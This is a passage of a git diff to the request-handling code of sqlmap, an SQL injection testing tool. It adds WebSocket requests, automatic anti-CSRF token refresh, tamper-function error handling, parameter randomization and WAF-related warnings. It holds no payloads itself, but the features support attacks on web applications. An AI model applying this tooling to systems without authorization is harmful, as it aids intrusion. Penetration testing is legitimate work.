+                seqMatcher.set_seq2(seq2)
+            except MemoryError:
+                seq2 = seq2[:len(seq2) / 1024]
+            else:
+                break
 
         ratio = round(seqMatcher.quick_ratio(), 3)
 
diff --git a/lib/request/connect.py b/lib/request/connect.py
index 2bc90c777..8914e6cb0 100644
--- a/lib/request/connect.py
+++ b/lib/request/connect.py
@@ -1,21 +1,31 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
+import compiler
 import httplib
 import json
+import keyword
 import logging
 import re
 import socket
 import string
+import struct
 import time
 import traceback
 import urllib2
 import urlparse
 
+try:
+    import websocket
+    from websocket import WebSocketException
+except ImportError:
+    class WebSocketException(Exception):
+        pass
+
 from extra.safe2bin.safe2bin import safecharencode
 from lib.core.agent import agent
 from lib.core.common import asciifyUrl
@@ -27,6 +37,7 @@ from lib.core.common import evaluateCode
 from lib.core.common import extractRegexResult
 from lib.core.common import findMultipartPostBoundary
 from lib.core.common import getCurrentThreadData
+from lib.core.common import getHeader
 from lib.core.common import getHostHeader
 from lib.core.common import getRequestHeader
 from lib.core.common import getUnicode
@@ -62,13 +73,16 @@ from lib.core.enums import REDIRECTION
 from lib.core.enums import WEB_API
 from lib.core.exception import SqlmapCompressionException
 from lib.core.exception import SqlmapConnectionException
+from lib.core.exception import SqlmapGenericException
 from lib.core.exception import SqlmapSyntaxException
+from lib.core.exception import SqlmapTokenException
 from lib.core.exception import SqlmapValueException
 from lib.core.settings import ASTERISK_MARKER
 from lib.core.settings import CUSTOM_INJECTION_MARK_CHAR
 from lib.core.settings import DEFAULT_CONTENT_TYPE
 from lib.core.settings import DEFAULT_COOKIE_DELIMITER
 from lib.core.settings import DEFAULT_GET_POST_DELIMITER
+from lib.core.settings import EVALCODE_KEYWORD_SUFFIX
 from lib.core.settings import HTTP_ACCEPT_HEADER_VALUE
 from lib.core.settings import HTTP_ACCEPT_ENCODING_HEADER_VALUE
 from lib.core.settings import MAX_CONNECTION_CHUNK_SIZE
@@ -92,8 +106,9 @@ from lib.request.basic import processResponse
 from lib.request.direct import direct
 from lib.request.comparison import comparison
 from lib.request.methodrequest import MethodRequest
-from thirdparty.socks.socks import ProxyError
 from thirdparty.multipart import multipartpost
+from thirdparty.odict.odict import OrderedDict
+from thirdparty.socks.socks import ProxyError
 
 
 class Connect(object):
@@ -159,7 +174,7 @@ class Connect(object):
 
         if not kb.dnsMode and conn:
             headers = conn.info()
-            if headers and (headers.getheader(HTTP_HEADER.CONTENT_ENCODING, "").lower() in ("gzip", "deflate")\
+            if headers and hasattr(headers, "getheader") and (headers.getheader(HTTP_HEADER.CONTENT_ENCODING, "").lower() in ("gzip", "deflate")\
               or "text" not in headers.getheader(HTTP_HEADER.CONTENT_TYPE, "").lower()):
                 retVal = conn.read(MAX_CONNECTION_TOTAL_SIZE)
                 if len(retVal) == MAX_CONNECTION_TOTAL_SIZE:
@@ -197,8 +212,10 @@ class Connect(object):
         elif conf.cpuThrottle:
             cpuThrottle(conf.cpuThrottle)
 
-        if conf.dummy:
-            return randomStr(int(randomInt()), alphabet=[chr(_) for _ in xrange(256)]), {}, int(randomInt())
+        if conf.offline:
+            return None, None, None
+        elif conf.dummy:
+            return getUnicode(randomStr(int(randomInt()), alphabet=[chr(_) for _ in xrange(256)]), {}, int(randomInt())), None, None
 
         threadData = getCurrentThreadData()
         with kb.locks.request:
@@ -226,6 +243,8 @@ class Connect(object):
         crawling = kwargs.get("crawling",           False)
         skipRead = kwargs.get("skipRead",           False)
 
+        websocket_ = url.lower().startswith("ws")
+
         if not urlparse.urlsplit(url).netloc:
             url = urlparse.urljoin(conf.url, url)
 
@@ -259,10 +278,6 @@ class Connect(object):
         # support those by default
         url = asciifyUrl(url)
 
-        # fix for known issues when using url in unicode format
-        # (e.g. UnicodeDecodeError: "url = url + '?' + query" in redirect case)
-        url = unicodeencode(url)
-
         try:
             socket.setdefaulttimeout(timeout)
 
@@ -271,7 +286,6 @@ class Connect(object):
                     url, params = url.split('?', 1)
                     params = urlencode(params)
                     url = "%s?%s" % (url, params)
-                    requestMsg += "?%s" % params
 
             elif multipart:
                 # Needed in this form because of potential circle dependency
@@ -302,10 +316,14 @@ class Connect(object):
                         get = urlencode(get, limit=True)
 
                 if get:
-                    url = "%s?%s" % (url, get)
-                    requestMsg += "?%s" % get
+                    if '?' in url:
+                        url = "%s%s%s" % (url, DEFAULT_GET_POST_DELIMITER, get)
+                        requestMsg += "%s%s" % (DEFAULT_GET_POST_DELIMITER, get)
+                    else:
+                        url = "%s?%s" % (url, get)
+                        requestMsg += "?%s" % get
 
-                if PLACE.POST in conf.parameters and not post and method in (None, HTTPMETHOD.POST):
+                if PLACE.POST in conf.parameters and not post and method != HTTPMETHOD.GET:
                     post = conf.parameters[PLACE.POST]
 
             elif get:
@@ -315,7 +333,7 @@ class Connect(object):
             requestMsg += " %s" % httplib.HTTPConnection._http_vsn_str
 
             # Prepare HTTP headers
-            headers = forgeHeaders({HTTP_HEADER.COOKIE: cookie, HTTP_HEADER.USER_AGENT: ua, HTTP_HEADER.REFERER: referer})
+            headers = forgeHeaders({HTTP_HEADER.COOKIE: cookie, HTTP_HEADER.USER_AGENT: ua, HTTP_HEADER.REFERER: referer, HTTP_HEADER.HOST: host})
 
             if kb.authHeader:
                 headers[HTTP_HEADER.AUTHORIZATION] = kb.authHeader
@@ -323,11 +341,16 @@ class Connect(object):
             if kb.proxyAuthHeader:
                 headers[HTTP_HEADER.PROXY_AUTHORIZATION] = kb.proxyAuthHeader
 
-            headers[HTTP_HEADER.ACCEPT] = HTTP_ACCEPT_HEADER_VALUE
-            headers[HTTP_HEADER.ACCEPT_ENCODING] = HTTP_ACCEPT_ENCODING_HEADER_VALUE if kb.pageCompress else "identity"
-            headers[HTTP_HEADER.HOST] = host or getHostHeader(url)
+            if not getHeader(headers, HTTP_HEADER.ACCEPT):
+                headers[HTTP_HEADER.ACCEPT] = HTTP_ACCEPT_HEADER_VALUE
 
-            if post is not None and HTTP_HEADER.CONTENT_TYPE not in headers:
+            if not getHeader(headers, HTTP_HEADER.HOST) or not target:
+                headers[HTTP_HEADER.HOST] = getHostHeader(url)
+
+            if not getHeader(headers, HTTP_HEADER.ACCEPT_ENCODING):
+                headers[HTTP_HEADER.ACCEPT_ENCODING] = HTTP_ACCEPT_ENCODING_HEADER_VALUE if kb.pageCompress else "identity"
+
+            if post is not None and not getHeader(headers, HTTP_HEADER.CONTENT_TYPE):
                 headers[HTTP_HEADER.CONTENT_TYPE] = POST_HINT_CONTENT_TYPES.get(kb.postHint, DEFAULT_CONTENT_TYPE)
 
             if headers.get(HTTP_HEADER.CONTENT_TYPE) == POST_HINT_CONTENT_TYPES[POST_HINT.MULTIPART]:
@@ -350,65 +373,92 @@ class Connect(object):
                 del headers[key]
                 headers[unicodeencode(key, kb.pageEncoding)] = unicodeencode(item, kb.pageEncoding)
 
+            url = unicodeencode(url)
             post = unicodeencode(post, kb.pageEncoding)
 
-            if method:
-                req = MethodRequest(url, post, headers)
-                req.set_method(method)
+            if websocket_:
+                ws = websocket.WebSocket()
+                ws.connect(url, header=("%s: %s" % _ for _ in headers.items() if _[0] not in ("Host",)), cookie=cookie)  # WebSocket will add Host field of headers automatically
+                ws.send(urldecode(post or ""))
+                page = ws.recv()
+                ws.close()
+                code = ws.status
+                status = httplib.responses[code]
+                class _(dict):
+                    pass
+                responseHeaders = _(ws.getheaders())
+                responseHeaders.headers = ["%s: %s\r\n" % (_[0].capitalize(), _[1]) for _ in responseHeaders.items()]
+
+                requestHeaders += "\n".join("%s: %s" % (getUnicode(key.capitalize() if isinstance(key, basestring) else key), getUnicode(value)) for (key, value) in responseHeaders.items())
+                requestMsg += "\n%s" % requestHeaders
+
+                if post is not None:
+                    requestMsg += "\n\n%s" % getUnicode(post)
+
+                requestMsg += "\n"
+
+                threadData.lastRequestMsg = requestMsg
+
+                logger.log(CUSTOM_LOGGING.TRAFFIC_OUT, requestMsg)
             else:
-                req = urllib2.Request(url, post, headers)
+                if method and method not in (HTTPMETHOD.GET, HTTPMETHOD.POST):
+                    method = unicodeencode(method)
+                    req = MethodRequest(url, post, headers)
+                    req.set_method(method)
+                else:
+                    req = urllib2.Request(url, post, headers)
 
-            requestHeaders += "\n".join("%s: %s" % (key.capitalize() if isinstance(key, basestring) else key, getUnicode(value)) for (key, value) in req.header_items())
+                requestHeaders += "\n".join("%s: %s" % (getUnicode(key.capitalize() if isinstance(key, basestring) else key), getUnicode(value)) for (key, value) in req.header_items())
 
-            if not getRequestHeader(req, HTTP_HEADER.COOKIE) and conf.cj:
-                conf.cj._policy._now = conf.cj._now = int(time.time())
-                cookies = conf.cj._cookies_for_request(req)
-                requestHeaders += "\n%s" % ("Cookie: %s" % ";".join("%s=%s" % (getUnicode(cookie.name), getUnicode(cookie.value)) for cookie in cookies))
+                if not getRequestHeader(req, HTTP_HEADER.COOKIE) and conf.cj:
+                    conf.cj._policy._now = conf.cj._now = int(time.time())
+                    cookies = conf.cj._cookies_for_request(req)
+                    requestHeaders += "\n%s" % ("Cookie: %s" % ";".join("%s=%s" % (getUnicode(cookie.name), getUnicode(cookie.value)) for cookie in cookies))
 
-            if post is not None:
-                if not getRequestHeader(req, HTTP_HEADER.CONTENT_LENGTH):
-                    requestHeaders += "\n%s: %d" % (string.capwords(HTTP_HEADER.CONTENT_LENGTH), len(post))
+                if post is not None:
+                    if not getRequestHeader(req, HTTP_HEADER.CONTENT_LENGTH):
+                        requestHeaders += "\n%s: %d" % (string.capwords(HTTP_HEADER.CONTENT_LENGTH), len(post))
 
-            if not getRequestHeader(req, HTTP_HEADER.CONNECTION):
-                requestHeaders += "\n%s: close" % HTTP_HEADER.CONNECTION
+                if not getRequestHeader(req, HTTP_HEADER.CONNECTION):
+                    requestHeaders += "\n%s: close" % HTTP_HEADER.CONNECTION
 
-            requestMsg += "\n%s" % requestHeaders
+                requestMsg += "\n%s" % requestHeaders
 
-            if post is not None:
-                requestMsg += "\n\n%s" % getUnicode(post)
+                if post is not None:
+                    requestMsg += "\n\n%s" % getUnicode(post)
 
-            requestMsg += "\n"
+                requestMsg += "\n"
 
-            threadData.lastRequestMsg = requestMsg
+                threadData.lastRequestMsg = requestMsg
 
-            logger.log(CUSTOM_LOGGING.TRAFFIC_OUT, requestMsg)
+                logger.log(CUSTOM_LOGGING.TRAFFIC_OUT, requestMsg)
 
-            conn = urllib2.urlopen(req)
+                conn = urllib2.urlopen(req)
 
-            if not kb.authHeader and getRequestHeader(req, HTTP_HEADER.AUTHORIZATION) and conf.authType == AUTH_TYPE.BASIC:
-                kb.authHeader = getRequestHeader(req, HTTP_HEADER.AUTHORIZATION)
+                if not kb.authHeader and getRequestHeader(req, HTTP_HEADER.AUTHORIZATION) and (conf.authType or "").lower() == AUTH_TYPE.BASIC.lower():
+                    kb.authHeader = getRequestHeader(req, HTTP_HEADER.AUTHORIZATION)
 
-            if not kb.proxyAuthHeader and getRequestHeader(req, HTTP_HEADER.PROXY_AUTHORIZATION):
-                kb.proxyAuthHeader = getRequestHeader(req, HTTP_HEADER.PROXY_AUTHORIZATION)
+                if not kb.proxyAuthHeader and getRequestHeader(req, HTTP_HEADER.PROXY_AUTHORIZATION):
+                    kb.proxyAuthHeader = getRequestHeader(req, HTTP_HEADER.PROXY_AUTHORIZATION)
 
-            # Return response object
-            if response:
-                return conn, None, None
+                # Return response object
+                if response:
+                    return conn, None, None
 
-            # Get HTTP response
-            if hasattr(conn, 'redurl'):
-                page = (threadData.lastRedirectMsg[1] if kb.redirectChoice == REDIRECTION.NO\
-                  else Connect._connReadProxy(conn)) if not skipRead else None
-                skipLogTraffic = kb.redirectChoice == REDIRECTION.NO
-                code = conn.redcode
-            else:
-                page = Connect._connReadProxy(conn) if not skipRead else None
+                # Get HTTP response
+                if hasattr(conn, 'redurl'):
+                    page = (threadData.lastRedirectMsg[1] if kb.redirectChoice == REDIRECTION.NO\
+                    else Connect._connReadProxy(conn)) if not skipRead else None
+                    skipLogTraffic = kb.redirectChoice == REDIRECTION.NO
+                    code = conn.redcode
+                else:
+                    page = Connect._connReadProxy(conn) if not skipRead else None
 
-            code = code or conn.code
-            responseHeaders = conn.info()
-            responseHeaders[URI_HTTP_HEADER] = conn.geturl()
-            page = decodePage(page, responseHeaders.get(HTTP_HEADER.CONTENT_ENCODING), responseHeaders.get(HTTP_HEADER.CONTENT_TYPE))
-            status = getUnicode(conn.msg)
+                code = code or conn.code
+                responseHeaders = conn.info()
+                responseHeaders[URI_HTTP_HEADER] = conn.geturl()
+                page = decodePage(page, responseHeaders.get(HTTP_HEADER.CONTENT_ENCODING), responseHeaders.get(HTTP_HEADER.CONTENT_TYPE))
+                status = getUnicode(conn.msg)
 
             if extractRegexResult(META_REFRESH_REGEX, page) and not refreshing:
                 url = extractRegexResult(META_REFRESH_REGEX, page)
@@ -442,7 +492,7 @@ class Connect(object):
                         pass
 
             # Explicit closing of connection object
-            if not conf.keepAlive:
+            if conn and not conf.keepAlive:
                 try:
                     if hasattr(conn.fp, '_sock'):
                         conn.fp._sock.close()
@@ -473,8 +523,9 @@ class Connect(object):
                 page = page if isinstance(page, unicode) else getUnicode(page)
 
             code = e.code
-            threadData.lastHTTPError = (threadData.lastRequestUID, code)
 
+            kb.originalCode = kb.originalCode or code
+            threadData.lastHTTPError = (threadData.lastRequestUID, code)
             kb.httpErrorCodes[code] = kb.httpErrorCodes.get(code, 0) + 1
 
             status = getUnicode(e.msg)
@@ -524,18 +575,22 @@ class Connect(object):
                 debugMsg = "got HTTP error code: %d (%s)" % (code, status)
                 logger.debug(debugMsg)
 
-        except (urllib2.URLError, socket.error, socket.timeout, httplib.BadStatusLine, httplib.IncompleteRead, ProxyError, SqlmapCompressionException), e:
+        except (urllib2.URLError, socket.error, socket.timeout, httplib.HTTPException, struct.error, ProxyError, SqlmapCompressionException, WebSocketException), e:
             tbMsg = traceback.format_exc()
 
             if "no host given" in tbMsg:
                 warnMsg = "invalid URL address used (%s)" % repr(url)
                 raise SqlmapSyntaxException(warnMsg)
-            elif "forcibly closed" in tbMsg:
+            elif "forcibly closed" in tbMsg or "Connection is already closed" in tbMsg:
                 warnMsg = "connection was forcibly closed by the target URL"
             elif "timed out" in tbMsg:
+                if kb.testMode and kb.testType not in (None, PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED):
+                    singleTimeWarnMessage("there is a possibility that the target (or WAF) is dropping 'suspicious' requests")
                 warnMsg = "connection timed out to the target URL"
             elif "URLError" in tbMsg or "error" in tbMsg:
                 warnMsg = "unable to connect to the target URL"
+            elif "NTLM" in tbMsg:
+                warnMsg = "there has been a problem with NTLM authentication"
             elif "BadStatusLine" in tbMsg:
                 warnMsg = "connection dropped or unknown HTTP "
                 warnMsg += "status code received"
@@ -545,6 +600,10 @@ class Connect(object):
             elif "IncompleteRead" in tbMsg:
                 warnMsg = "there was an incomplete read error while retrieving data "
                 warnMsg += "from the target URL"
+            elif "Handshake status" in tbMsg:
+                status = re.search("Handshake status ([\d]{3})", tbMsg)
+                errMsg = "websocket handshake status %s" % status.group(1) if status else "unknown"
+                raise SqlmapConnectionException(errMsg)
             else:
                 warnMsg = "unable to connect to the target URL"
 
@@ -581,7 +640,13 @@ class Connect(object):
         if conn and getattr(conn, "redurl", None):
             _ = urlparse.urlsplit(conn.redurl)
             _ = ("%s%s" % (_.path or "/", ("?%s" % _.query) if _.query else ""))
-            requestMsg = re.sub("(\n[A-Z]+ ).+?( HTTP/\d)", "\g<1>%s\g<2>" % getUnicode(_), requestMsg, 1)
+            requestMsg = re.sub("(\n[A-Z]+ ).+?( HTTP/\d)", "\g<1>%s\g<2>" % re.escape(getUnicode(_)), requestMsg, 1)
+
+            if kb.resendPostOnRedirect is False:
+                requestMsg = re.sub("(\[#\d+\]:\n)POST ", "\g<1>GET ", requestMsg)
+                requestMsg = re.sub("(?i)Content-length: \d+\n", "", requestMsg)
+                requestMsg = re.sub("(?s)\n\n.+", "\n", requestMsg)
+
             responseMsg += "[#%d] (%d %s):\n" % (threadData.lastRequestUID, conn.code, status)
         else:
             responseMsg += "[#%d] (%d %s):\n" % (threadData.lastRequestUID, code, status)
@@ -630,13 +695,14 @@ class Connect(object):
             auxHeaders = {}
 
         raise404 = place != PLACE.URI if raise404 is None else raise404
+        method = method or conf.method
 
         value = agent.adjustLateValues(value)
         payload = agent.extractPayload(value)
         threadData = getCurrentThreadData()
 
         if conf.httpHeaders:
-            headers = dict(conf.httpHeaders)
+            headers = OrderedDict(conf.httpHeaders)
             contentType = max(headers[_] if _.upper() == HTTP_HEADER.CONTENT_TYPE.upper() else None for _ in headers.keys())
 
             if (kb.postHint or conf.skipUrlEncode) and kb.postUrlEncode:
@@ -648,7 +714,13 @@ class Connect(object):
         if payload:
             if kb.tamperFunctions:
                 for function in kb.tamperFunctions:
-                    payload = function(payload=payload, headers=auxHeaders)
+                    try:
+                        payload = function(payload=payload, headers=auxHeaders)
+                    except Exception, ex:
+                        errMsg = "error occurred while running tamper "
+                        errMsg += "function '%s' ('%s')" % (function.func_name, ex)
+                        raise SqlmapGenericException(errMsg)
+
                     if not isinstance(payload, basestring):
                         errMsg = "tamper function '%s' returns " % function.func_name
                         errMsg += "invalid payload type ('%s')" % type(payload)
@@ -677,7 +749,7 @@ class Connect(object):
                     payload = payload.replace("'", REPLACEMENT_MARKER).replace('"', "'").replace(REPLACEMENT_MARKER, '"')
                 value = agent.replacePayload(value, payload)
             else:
-                # GET, POST, URI and Cookie payload needs to be throughly URL encoded
+                # GET, POST, URI and Cookie payload needs to be thoroughly URL encoded
                 if place in (PLACE.GET, PLACE.URI, PLACE.COOKIE) and not conf.skipUrlEncode or place in (PLACE.POST, PLACE.CUSTOM_POST) and kb.postUrlEncode:
                     payload = urlencode(payload, '%', False, place != PLACE.URI)  # spaceplus is handled down below
                     value = agent.replacePayload(value, payload)
@@ -745,54 +817,137 @@ class Connect(object):
         if value and place == PLACE.CUSTOM_HEADER:
             auxHeaders[value.split(',')[0]] = value.split(',', 1)[1]
 
+        if conf.csrfToken:
+            def _adjustParameter(paramString, parameter, newValue):
+                retVal = paramString
+                match = re.search("%s=(?P<value>[^&]*)" % re.escape(parameter), paramString)
+                if match:
+                    retVal = re.sub("%s=[^&]*" % re.escape(parameter), "%s=%s" % (parameter, newValue), paramString)
+                return retVal
+
+            page, headers, code = Connect.getPage(url=conf.csrfUrl or conf.url, data=conf.data if conf.csrfUrl == conf.url else None, method=conf.method if conf.csrfUrl == conf.url else None, cookie=conf.parameters.get(PLACE.COOKIE), direct=True, silent=True, ua=conf.parameters.get(PLACE.USER_AGENT), referer=conf.parameters.get(PLACE.REFERER), host=conf.parameters.get(PLACE.HOST))
+            match = re.search(r"<input[^>]+name=[\"']?%s[\"']?\s[^>]*value=(\"([^\"]+)|'([^']+)|([^ >]+))" % re.escape(conf.csrfToken), page or "")
+            token = (match.group(2) or match.group(3) or match.group(4)) if match else None
+
+            if not token:
+                if conf.csrfUrl != conf.url and code == httplib.OK:
+                    if headers and "text/plain" in headers.get(HTTP_HEADER.CONTENT_TYPE, ""):
+                        token = page
+
+                if not token and any(_.name == conf.csrfToken for _ in conf.cj):
+                    for _ in conf.cj:
+                        if _.name == conf.csrfToken:
+                            token = _.value
+                            if not any (conf.csrfToken in _ for _ in (conf.paramDict.get(PLACE.GET, {}), conf.paramDict.get(PLACE.POST, {}))):
+                                if post:
+                                    post = "%s%s%s=%s" % (post, conf.paramDel or DEFAULT_GET_POST_DELIMITER, conf.csrfToken, token)
+                                elif get:
+                                    get = "%s%s%s=%s" % (get, conf.paramDel or DEFAULT_GET_POST_DELIMITER, conf.csrfToken, token)
+                                else:
+                                    get = "%s=%s" % (conf.csrfToken, token)
+                            break
+
+                if not token:
+                    errMsg = "anti-CSRF token '%s' can't be found at '%s'" % (conf.csrfToken, conf.csrfUrl or conf.url)
+                    if not conf.csrfUrl:
+                        errMsg += ". You can try to rerun by providing "
+                        errMsg += "a valid value for option '--csrf-url'"
+                    raise SqlmapTokenException, errMsg
+
+            if token:
+                for place in (PLACE.GET, PLACE.POST):
+                    if place in conf.parameters:
+                        if place == PLACE.GET and get:
+                            get = _adjustParameter(get, conf.csrfToken, token)
+                        elif place == PLACE.POST and post:
+                            post = _adjustParameter(post, conf.csrfToken, token)
+
+                for i in xrange(len(conf.httpHeaders)):
+                    if conf.httpHeaders[i][0].lower() == conf.csrfToken.lower():
+                        conf.httpHeaders[i] = (conf.httpHeaders[i][0], token)
+
         if conf.rParam:
             def _randomizeParameter(paramString, randomParameter):
                 retVal = paramString
-                match = re.search("%s=(?P<value>[^&;]+)" % randomParameter, paramString)
+                match = re.search(r"(\A|\b)%s=(?P<value>[^&;]+)" % re.escape(randomParameter), paramString)
                 if match:
                     origValue = match.group("value")
-                    retVal = re.sub("%s=[^&;]+" % randomParameter, "%s=%s" % (randomParameter, randomizeParameterValue(origValue)), paramString)
+                    retVal = re.sub(r"(\A|\b)%s=[^&;]+" % re.escape(randomParameter), "%s=%s" % (randomParameter, randomizeParameterValue(origValue)), paramString)
                 return retVal
 
             for randomParameter in conf.rParam:
-                for item in (PLACE.GET, PLACE.POST, PLACE.COOKIE):
+                for item in (PLACE.GET, PLACE.POST, PLACE.COOKIE, PLACE.URI, PLACE.CUSTOM_POST):
                     if item in conf.parameters:
                         if item == PLACE.GET and get:
                             get = _randomizeParameter(get, randomParameter)
-                        elif item == PLACE.POST and post:
+                        elif item in (PLACE.POST, PLACE.CUSTOM_POST) and post:
                             post = _randomizeParameter(post, randomParameter)
                         elif item == PLACE.COOKIE and cookie:
                             cookie = _randomizeParameter(cookie, randomParameter)
+                        elif item == PLACE.URI and uri:
+                            uri = _randomizeParameter(uri, randomParameter)
 
         if conf.evalCode:
             delimiter = conf.paramDel or DEFAULT_GET_POST_DELIMITER
-            variables = {}
+            variables = {"uri": uri}
             originals = {}
+            keywords = keyword.kwlist
 
             for item in filter(None, (get, post if not kb.postHint else None)):
                 for part in item.split(delimiter):
                     if '=' in part:
                         name, value = part.split('=', 1)
+                        name = re.sub(r"[^\w]", "", name.strip())
+                        if name in keywords:
+                            name = "%s%s" % (name, EVALCODE_KEYWORD_SUFFIX)
                         value = urldecode(value, convall=True, plusspace=(item==post and kb.postSpaceToPlus))
-                        evaluateCode("%s=%s" % (name.strip(), repr(value)), variables)
+                        variables[name] = value
 
             if cookie:
                 for part in cookie.split(conf.cookieDel or DEFAULT_COOKIE_DELIMITER):
                     if '=' in part:
                         name, value = part.split('=', 1)
+                        name = re.sub(r"[^\w]", "", name.strip())
+                        if name in keywords:
+                            name = "%s%s" % (name, EVALCODE_KEYWORD_SUFFIX)
                         value = urldecode(value, convall=True)
-                        evaluateCode("%s=%s" % (name.strip(), repr(value)), variables)
+                        variables[name] = value
+
+            while True:
+                try:
+                    compiler.parse(conf.evalCode.replace(';', '\n'))
+                except SyntaxError, ex:
+                    original = replacement = ex.text.strip()
+                    for _ in re.findall(r"[A-Za-z_]+", original)[::-1]:
+                        if _ in keywords:
+                            replacement = replacement.replace(_, "%s%s" % (_, EVALCODE_KEYWORD_SUFFIX))
+                            break
+                    if original == replacement:
+                        conf.evalCode = conf.evalCode.replace(EVALCODE_KEYWORD_SUFFIX, "")
+                        break
+                    else:
+                        conf.evalCode = conf.evalCode.replace(ex.text.strip(), replacement)
+                else:
+                    break
 
             originals.update(variables)
             evaluateCode(conf.evalCode, variables)
 
+            for variable in variables.keys():
+                if variable.endswith(EVALCODE_KEYWORD_SUFFIX):
+                    value = variables[variable]
+                    del variables[variable]
+                    variables[variable.replace(EVALCODE_KEYWORD_SUFFIX, "")] = value
+
+            uri = variables["uri"]
+
             for name, value in variables.items():
                 if name != "__builtins__" and originals.get(name, "") != value:
                     if isinstance(value, (basestring, int)):
                         found = False
                         value = unicode(value)
 
-                        regex = r"((\A|%s)%s=).+?(%s|\Z)" % (re.escape(delimiter), name, re.escape(delimiter))
+                        regex = r"((\A|%s)%s=).+?(%s|\Z)" % (re.escape(delimiter), re.escape(name), re.escape(delimiter))
                         if re.search(regex, (get or "")):
                             found = True
                             get = re.sub(regex, "\g<1>%s\g<3>" % value, get)
@@ -856,44 +1011,47 @@ class Connect(object):
                 if deviation > WARN_TIME_STDEV:
                     kb.adjustTimeDelay = ADJUST_TIME_DELAY.DISABLE
 
-                    warnMsg = "there is considerable lagging "
+                    warnMsg = "considerable lagging has been detected "
                     warnMsg += "in connection response(s). Please use as high "
                     warnMsg += "value for option '--time-sec' as possible (e.g. "
                     warnMsg += "10 or more)"
                     logger.critical(warnMsg)
 
-
-        if conf.safUrl and conf.saFreq > 0:
+        if conf.safeFreq > 0:
             kb.queryCounter += 1
-            if kb.queryCounter % conf.saFreq == 0:
-                Connect.getPage(url=conf.safUrl, cookie=cookie, direct=True, silent=True, ua=ua, referer=referer, host=host)
+            if kb.queryCounter % conf.safeFreq == 0:
+                if conf.safeUrl:
+                    Connect.getPage(url=conf.safeUrl, post=conf.safePost, cookie=cookie, direct=True, silent=True, ua=ua, referer=referer, host=host)
+                elif kb.safeReq:
+                    Connect.getPage(url=kb.safeReq.url, post=kb.safeReq.post, method=kb.safeReq.method, auxHeaders=kb.safeReq.headers)
 
         start = time.time()
 
         if kb.nullConnection and not content and not response and not timeBasedCompare:
             noteResponseTime = False
 
-            pushValue(kb.pageCompress)
-            kb.pageCompress = False
+            try:
+                pushValue(kb.pageCompress)
+                kb.pageCompress = False
 
-            if kb.nullConnection == NULLCONNECTION.HEAD:
-                method = HTTPMETHOD.HEAD
-            elif kb.nullConnection == NULLCONNECTION.RANGE:
-                auxHeaders[HTTP_HEADER.RANGE] = "bytes=-1"
+                if kb.nullConnection == NULLCONNECTION.HEAD:
+                    method = HTTPMETHOD.HEAD
+                elif kb.nullConnection == NULLCONNECTION.RANGE:
+                    auxHeaders[HTTP_HEADER.RANGE] = "bytes=-1"
 
-            _, headers, code = Connect.getPage(url=uri, get=get, post=post, cookie=cookie, ua=ua, referer=referer, host=host, silent=silent, method=method, auxHeaders=auxHeaders, raise404=raise404, skipRead=(kb.nullConnection == NULLCONNECTION.SKIP_READ))
+                _, headers, code = Connect.getPage(url=uri, get=get, post=post, method=method, cookie=cookie, ua=ua, referer=referer, host=host, silent=silent, auxHeaders=auxHeaders, raise404=raise404, skipRead=(kb.nullConnection == NULLCONNECTION.SKIP_READ))
 
-            if headers:
-                if kb.nullConnection in (NULLCONNECTION.HEAD, NULLCONNECTION.SKIP_READ) and HTTP_HEADER.CONTENT_LENGTH in headers:
-                    pageLength = int(headers[HTTP_HEADER.CONTENT_LENGTH])
-                elif kb.nullConnection == NULLCONNECTION.RANGE and HTTP_HEADER.CONTENT_RANGE in headers:
-                    pageLength = int(headers[HTTP_HEADER.CONTENT_RANGE][headers[HTTP_HEADER.CONTENT_RANGE].find('/') + 1:])
-
-            kb.pageCompress = popValue()
+                if headers:
+                    if kb.nullConnection in (NULLCONNECTION.HEAD, NULLCONNECTION.SKIP_READ) and HTTP_HEADER.CONTENT_LENGTH in headers:
+                        pageLength = int(headers[HTTP_HEADER.CONTENT_LENGTH])
+                    elif kb.nullConnection == NULLCONNECTION.RANGE and HTTP_HEADER.CONTENT_RANGE in headers:
+                        pageLength = int(headers[HTTP_HEADER.CONTENT_RANGE][headers[HTTP_HEADER.CONTENT_RANGE].find('/') + 1:])
+            finally:
+                kb.pageCompress = popValue()
 
         if not pageLength:
             try:
-                page, headers, code = Connect.getPage(url=uri, get=get, post=post, cookie=cookie, ua=ua, referer=referer, host=host, silent=silent, method=method, auxHeaders=auxHeaders, response=response, raise404=raise404, ignoreTimeout=timeBasedCompare)
+                page, headers, code = Connect.getPage(url=uri, get=get, post=post, method=method, cookie=cookie, ua=ua, referer=referer, host=host, silent=silent, auxHeaders=auxHeaders, response=response, raise404=raise404, ignoreTimeout=timeBasedCompare)
             except MemoryError:
                 page, headers, code = None, None, None
                 warnMsg = "site returned insanely large response"
diff --git a/lib/request/direct.py b/lib/request/direct.py
index 86cc73ba7..937d6c5a4 100644
--- a/lib/request/direct.py
+++ b/lib/request/direct.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/lib/request/dns.py b/lib/request/dns.py
index 007063ad1..8f10a605a 100644
--- a/lib/request/dns.py
+++ b/lib/request/dns.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/lib/request/httpshandler.py b/lib/request/httpshandler.py
index c5c39e8a6..6906f4686 100644
--- a/lib/request/httpshandler.py
+++ b/lib/request/httpshandler.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
@@ -9,6 +9,7 @@ import httplib
 import socket
 import urllib2
 
+from lib.core.data import kb
 from lib.core.data import logger
 from lib.core.exception import SqlmapConnectionException
 
@@ -19,7 +20,7 @@ try:
 except ImportError:
     pass
 
-_protocols = [ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv23]
